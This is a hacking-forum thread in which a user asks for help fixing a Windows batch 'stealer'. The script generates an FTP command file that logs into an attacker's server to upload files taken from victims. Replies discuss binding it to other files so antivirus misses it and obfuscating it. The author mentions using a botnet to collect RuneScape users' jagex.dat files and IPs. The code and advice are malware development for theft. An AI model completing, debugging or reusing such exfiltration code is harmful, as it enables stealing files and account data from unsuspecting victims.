Help me with batch ftp

Worms

Onyx user!
Reputation
0
So, i'm making a batch stealer, and i'm making it connect the fto. The thing is: The password line is fucking up. If i reopen the server that i makes, and rewrite the password line it will work. Can anyone help me?



set /p host=FTP Host to connect:
set /p usrnm=FTP Username:
set /p paswrd=FTP Password:
echo echo user %usrnm%^> ftpcmd.dat > online.bat
echo echo %paswrd%^>^> ftpcmd.dat >> online.bat
echo echo cd public_html^>^> ftpcmd.dat >> online.bat

Here is the part that send files that i deleted because its useless for help.

echo echo disconnect^>^> ftpcmd.dat >> online.bat
echo echo bye^>^> ftpcmd.dat >> online.bat
echo ftp -v -n -i -s:ftpcmd.dat %host% >> online.bat
echo del ftpcmd.dat >> online.bat
copy onlin*.bat Stealer.bat
del onli*
 
Is it truly a good idea to make a batch stealer? People can easily leech your data and fuck you over.
 
well, it's supposed to be binded to some file, and they are FUD lol.
 
They may be FUD to AV's, but I don't know a single sane person who'd execute a stray .bat file.
Either way I suggest you to find an alternative language to complete this project, unless you figure out a way to obfuscate batch script.


OT Though, the script looks fine to me; so I don't know what the problem is.
 
Judge, this is script is usefull on what i needed today. If you have abotnet and want to see who plays runescape, make it send the IP of who has the jagex.dat on the user folder. Or if you wanna steal specific files in bulk.
 
Back
Top